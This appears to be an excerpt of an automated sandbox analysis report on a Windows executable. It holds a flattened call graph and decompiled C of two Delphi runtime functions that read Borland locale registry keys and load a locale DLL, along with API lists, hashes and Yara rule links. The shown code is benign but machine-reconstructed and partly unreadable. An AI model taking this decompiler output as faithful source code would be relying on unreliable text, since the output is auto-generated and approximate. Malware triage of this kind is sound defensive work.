17936->17933 17937->17936 17938 422134 62 API calls 17937->17938 17939 4221c4 62 API calls 17937->17939 17938->17937 17939->17937 17941 41ac6c 62 API calls 17940->17941 17942 45828c 17941->17942 17942->17847 17944 40d24a 17943->17944 17945 406a70 62 API calls 17944->17945 17946 40d274 17945->17946 17947 40a664 62 API calls 17946->17947 17948 40d282 17947->17948 17949 404a14 31 API calls 17948->17949 17950 40d28d 17949->17950 17951 4049e4 17 API calls 17950->17951 17952 40d2a7 17951->17952 17952->17854 17954 421490 17953->17954 17955 42148b 17953->17955 17954->17858 17964 42146c ResetEvent 17955->17964 17957->17858 17959 41ab67 17958->17959 17960 41ab7b 17959->17960 17961 41abf8 62 API calls 17959->17961 17962 41ac6c 62 API calls 17960->17962 17961->17960 17963 41ab84 17962->17963 17963->17864 17964->17954 17966 4045d6 17965->17966 17967 404600 17965->17967 17966->17967 17975 406b3c 17966->17975 17967->17349 17970 404821 17969->17970 17971 4047ca GetStdHandle WriteFile GetStdHandle WriteFile 17969->17971 17973 40482a MessageBoxA 17970->17973 17974 40483d 17970->17974 17971->17348 17973->17974 17974->17348 17976 406b55 17975->17976 17977 406b78 17975->17977 17985 40308c 17976->17985 17977->17966 17980 40308c 4 API calls 17981 406b69 17980->17981 17982 40308c 4 API calls 17981->17982 17983 406b73 17982->17983 17992 401b60 17983->17992 17986 4030cb 17985->17986 17987 40309c 17985->17987 17988 4028e4 4 API calls 17986->17988 17991 4030c9 17986->17991 17987->17986 17989 4030a2 17987->17989 17988->17991 17989->17991 18004 4028e4 17989->18004 17991->17980 17993 401b71 17992->17993 17994 401c3d 17992->17994 17995 401b92 LocalFree 17993->17995 17996 401b88 RtlEnterCriticalSection 17993->17996 17994->17977 17997 401bc5 17995->17997 17996->17995 17998 401bb3 VirtualFree 17997->17998 17999 401bcd 17997->17999 17998->17997 18000 401bf4 LocalFree 17999->18000 18001 401c0b 17999->18001 18000->18000 18000->18001 18002 401c21 RtlLeaveCriticalSection 18001->18002 18003 401c2b RtlDeleteCriticalSection 18001->18003 18002->18003 18003->17977 18005 406cdc 4 API calls 18004->18005 18006 4028ec 18005->18006 18006->17991 18007 407a8a 18011 402c0c 18007->18011 18009 407a9f CreateWindowExA 18010 407ad9 18009->18010 18011->18009 18012 421b88 18013 421b90 18012->18013 18024 421ddc 18013->18024 18015 421bc5 18029 421d84 18015->18029 18017 421b9c 18017->18015 18022 41ac6c 62 API calls 18017->18022 18019 421be2 18039 41b278 18019->18039 18022->18017 18023 421bef 18025 421e11 18024->18025 18026 421de7 18024->18026 18025->18017 18026->18025 18027 41ac6c 62 API calls 18026->18027 18028 421ddc 62 API calls 18026->18028 18027->18026 18028->18026 18032 421d8b 18029->18032 18030 421bd4 18030->18019 18035 421d4c 18030->18035 18032->18030 18033 421d4c 62 API calls 18032->18033 18043 41ad54 18032->18043 18046 421ccc 18032->18046 18033->18032 18036 421d61 18035->18036 18037 421ccc 62 API calls 18036->18037 18038 421d7e 18037->18038 18038->18019 18040 41b27f 18039->18040 18053 41e870 18040->18053 18042 41b28a 18042->18023 18044 41ac6c 62 API calls 18043->18044 18045 41ad5d 18044->18045 18045->18032 18049 41ae08 18046->18049 18048 421cdc 18048->18032 18051 41ae13 18049->18051 18050 41ae22 18050->18048 18051->18050 18052 41ab5c 62 API calls 18051->18052 18052->18050 18054 41e883 18053->18054 18055 41e8ee 18053->18055 18063 41b06c RtlEnterCriticalSection 18054->18063 18055->18042 18057 41e8cf 18064 41b0d0 RtlLeaveCriticalSection 18057->18064 18058 41ac6c 62 API calls 18060 41e88d 18058->18060 18060->18057 18060->18058 18062 41ab5c 62 API calls 18060->18062 18061 41e8e6 18061->18042 18062->18060 18063->18060 18064->18061 18065 41aa2c 18066 41aa42 18065->18066 18067 41aa77 18066->18067 18089 41a8a0 18066->18089 18075 41a984 18067->18075 18072 41aaa2 18073 41aaba 18072->18073 18103 41a928 18072->18103 18076 41aa02 18075->18076 18077 41a9ae 18075->18077 18078 4049c0 17 API calls 18076->18078 18077->18076 18116 403b78 18077->18116 18080 41aa19 18078->18080 18080->18072 18098 41a8f8 18080->18098 18081 41a9c1 18082 41a984 70 API calls 18081->18082 18083 41a9c6 18082->18083 18120 405f8c 18083->18120 18086 405fdc 30 API calls 18087 41a9f4 18086->18087 18123 41a81c 18087->18123 18090 406cdc 4 API calls 18089->18090 18093 41a8a6 18090->18093 18091 41a8c3 18092 406cdc 4 API calls 18091->18092 18095 41a8ce 18092->18095 18093->18091 18094 406cdc 4 API calls 18093->18094 18094->18091 18096 406cdc 4 API calls 18095->18096 18097 41a8ee 18096->18097 18097->18067 18099 406cdc 4 API calls 18098->18099 18102 41a900 18099->18102 18100 41a923 18100->18072 18101 41ac6c 62 API calls 18101->18102 18102->18100 18102->18101 18104 406cdc 4 API calls 18103->18104 18105 41a92f 18104->18105 18106 406cdc 4 API calls 18105->18106 18107 41a93f 18106->18107 18108 41ad54 62 API calls 18107->18108 18109 41a94c 18108->18109 18110 406cdc 4 API calls 18109->18110 18111 41a953 18110->18111 18112 41ab5c 62 API calls 18111->18112 18113 41a964 18112->18113 18114 41a96f 18113->18114 18115 406cdc 4 API calls 18113->18115 18114->18073 18115->18114 18117 403b7f 18116->18117 18117->18081 18118 40275c 31 API calls 18117->18118 18119 403b93 18118->18119 18119->18081 18132 405f64 VirtualQuery 18120->18132 18124 41a82d 18123->18124 18125 41a83c FindResourceA 18124->18125 18126 41a899 18125->18126 18127 41a84c 18125->18127 18126->18076 18134 41e0d0 18127->18134 18129 41a85d 18138 41da30 18129->18138 18131 41a878 18131->18076 18133 405f7e 18132->18133 18133->18086 18135 41e0da 18134->18135 18143 41e198 FindResourceA 18135->18143 18137 41e108 18137->18129 18160 41e254 18138->18160 18140 41da4c 18164 420288 18140->18164 18142 41da67 18142->18131 18144 41e1c4 LoadResource 18143->18144 18145 41e1bd 18143->18145 18147 41e1d7 18144->18147 18148 41e1de SizeofResource LockResource 18144->18148 18153 41e128 18145->18153 18150 41e128 62 API calls 18147->18150 18151 41e1fc 18148->18151 18152 41e1dd 18150->18152 18151->18137 18152->18148 18154 406a70 62 API calls 18153->18154 18155 41e161 18154->18155 18156 40d180 62 API calls 18155->18156 18157 41e170 18156->18157 18158 4049c0 17 API calls 18157->18158 18159 41e18a 18158->18159 18159->18144 18161 41e25e 18160->18161 18162 40275c 31 API calls 18161->18162 18163 41e277 18162->18163 18163->18140 18189 420670 18164->18189 18167 420300 18205 420694 18167->18205 18168 420335 18169 420694 62 API calls 18168->18169 18171 420346 18169->18171 18173 42034f 18171->18173 18174 42035c 18171->18174 18176 420694 62 API calls 18173->18176 18177 420694 62 API calls 18174->18177 18182 420328 18176->18182 18179 420377 18177->18179 18217 420228 18179->18217 18181 420694 62 API calls 18181->18182 18194 41a0e8 18182->18194 18185 406cdc 4 API calls 18186 4203d0 18185->18186 18187 41ac6c 62 API calls 18186->18187 18188 4204a0 18186->18188 18187->18186 18188->18142 18223 41ee34 18189->18223 18192 4202c1 18192->18167 18192->18168 18195 41a0f5 18194->18195 18238 419fd4 RtlEnterCriticalSection 18195->18238 18197 41a1cf 18239 41a08c RtlLeaveCriticalSection 18197->18239 18198 41ac6c 62 API calls 18203 41a12c 18198->18203 18200 41a1e6 18200->18185 18201 41ac6c 62 API calls 18204 41a18e 18201->18204 18203->18198 18203->18204 18240 419b10 18203->18240 18204->18197 18204->18201 18206 41ee34 62 API calls 18205->18206 18207 4206a9 18206->18207 18208 404ab0 31 API calls 18207->18208 18209 4206b7 18208->18209 18210 41ee34 62 API calls 18209->18210 18211 42030b 18210->18211 18212 41a398 18211->18212 18244 41a344 18212->18244 18215 41a3b0 18215->18181 18218 404a14 31 API calls 18217->18218 18219 420240 18218->18219 18221 42026f 18219->18221 18222 40a664 62 API calls 18219->18222 18269 41a7f8 18219->18269 18221->18182 18222->18219 18226 41ee3f 18223->18226 18224 41ee79 18224->18192 18227 41e8f4 18224->18227 18226->18224 18230 41ee80 18226->18230 18228 40d200 62 API calls 18227->18228 18229 41e905 18228->18229 18229->18192 18231 41ee92 18230->18231 18232 41eead 18231->18232 18234 40d200 18231->18234 18232->18226 18235 40d207 18234->18235 18236 406a70 62 API calls 18235->18236 18237 40d21f 18236->18237 18237->18232 18238->18203 18239->18200 18241 419b46 18240->18241 18243 419b28 18240->18243 18241->18203 18242 41ac6c 62 API calls 18242->18243 18243->18241 18243->18242 18258 419fd4 RtlEnterCriticalSection 18244->18258 18246 41a355 18259 419e38 18246->18259 18250 41a389 18250->18215 18251 41a2d8 18250->18251 18252 406a70 62 API calls 18251->18252 18253 41a30e 18252->18253 18254 40d180 62 API calls 18253->18254 18255 41a31d 18254->18255 18256 4049c0 17 API calls 18255->18256 18257 41a337 18256->18257 18257->18215 18258->18246 18260 419e74 18259->18260 18263 419e4f 18259->18263 18264 41a08c RtlLeaveCriticalSection 18260->18264 18261 41ac6c 62 API calls 18261->18263 18263->18260 18263->18261 18265 419ab0 18263->18265 18264->18250 18266 419ae6 18265->18266 18268 419ac5 18265->18268 18266->18263 18267 41ac6c 62 API calls 18267->18268 18268->18266 18268->18267 18270 41a80e 18269->18270 18272 41a804 18269->18272 18274 41a7b8 18270->18274 18272->18219 18275 41a7f3 18274->18275 18277 41a7c8 18274->18277 18275->18219 18276 41ac6c 62 API calls 18276->18277 18277->18275 18277->18276 18278 409a8e 18279 404e80 18278->18279 18280 409aa1 SetFileAttributesA 18279->18280 18281 409ab2 18280->18281 18282 409aab GetLastError 18280->18282 18282->18281 18283 406f8e CreateMutexA 18284 409f52 18285 404e80 18284->18285 18286 409f60 CreateDirectoryA 18285->18286 18287 409a58 18288 404e80 18287->18288 18289 409a62 GetFileAttributesA 18288->18289 18290 409a6d 18289->18290 18291 41dd9a 18296 41db54 18291->18296 18293 41ddb6 18300 41dd84 18293->18300 18295 41ddd1 18297 41db5d 18296->18297 18304 41db98 18297->18304 18299 41db79 18299->18293 18301 41dd98 18300->18301 18302 41dd8c 18300->18302 18301->18295 18345 41d904 18302->18345 18305 41dbb3 18304->18305 18306 41dc43 18305->18306 18307 41dbda 18305->18307 18338 4098c4 18306->18338 18326 409940 18307->18326 18310 41dbe4 18325 41dc3c 18310->18325 18329 409e98 18310->18329 18311 41dc4d 18312 409e98 32 API calls 18311->18312 18311->18325 18315 41dc68 GetLastError 18312->18315 18314 4049e4 17 API calls 18317 41dcc0 18314->18317 18318 40c918 32 API calls 18315->18318 18317->18299 18321 41dc7f 18318->18321 18323 40d23c 62 API calls 18321->18323 18322 40d23c 62 API calls 18322->18325 18324 41dca1 18323->18324 18324->18325 18325->18314 18342 40991c 18326->18342 18328 409945 18328->18310 18330 404e80 18329->18330 18331 409eb6 GetFullPathNameA 18330->18331 18332 404ab0 31 API calls 18331->18332 18333 409ec9 GetLastError 18332->18333 18334 40c918 FormatMessageA 18333->18334 18335 40c93e 18334->18335 18336 404ab0 31 API calls 18335->18336 18337 40c95b 18336->18337 18337->18322 18339 409917 18338->18339 18340 4098d8 18338->18340 18339->18311 18340->18339 18341 409911 CreateFileA 18340->18341 18341->18339 18343 404e80 18342->18343 18344 409938 CreateFileA 18343->18344 18344->18328 18346 41d911 18345->18346 18347 41d932 18345->18347 18346->18347 18348 40d200 62 API calls 18346->18348 18347->18301 18348->18347 18349 409a7c 18350 404e80 18349->18350 18351 409a86 GetFileAttributesA 18350->18351 18352 41dadc 18355 409974 WriteFile 18352->18355 18356 409991 18355->18356

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                                                                                                                          0x004061d1
                                                                                                                                                                                          0x004061d3
                                                                                                                                                                                          0x004061db
                                                                                                                                                                                          0x004061ec
                                                                                                                                                                                          0x004061f1
                                                                                                                                                                                          0x0040620a
                                                                                                                                                                                          0x00406211
                                                                                                                                                                                          0x00406253
                                                                                                                                                                                          0x00406255
                                                                                                                                                                                          0x00406256
                                                                                                                                                                                          0x0040625b
                                                                                                                                                                                          0x0040625e
                                                                                                                                                                                          0x00406261
                                                                                                                                                                                          0x00406273
                                                                                                                                                                                          0x00406296
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062ba
                                                                                                                                                                                          0x004062c0
                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                          0x004062c6
                                                                                                                                                                                          0x004062d4
                                                                                                                                                                                          0x00406213
                                                                                                                                                                                          0x00406228
                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406231
                                                                                                                                                                                          0x00406246
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x0040622f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                          • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 25 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 26 406313-406317 25->26 27 4063f6-4063fd 25->27 28 406323-406339 lstrlen 26->28 29 406319-40631d 26->29 30 40633c-40633f 28->30 29->27 29->28 31 406341-406349 30->31 32 40634b-406353 30->32 31->32 33 40633b 31->33 32->27 34 406359-40635e 32->34 33->30 35 406360-406386 lstrcpyn LoadLibraryExA 34->35 36 406388-40638a 34->36 35->36 36->27 37 40638c-406390 36->37 37->27 38 406392-4063c2 lstrcpyn LoadLibraryExA 37->38 38->27 39 4063c4-4063f4 lstrcpyn LoadLibraryExA 38->39 39->27
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x004063f6
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633f
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406353

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
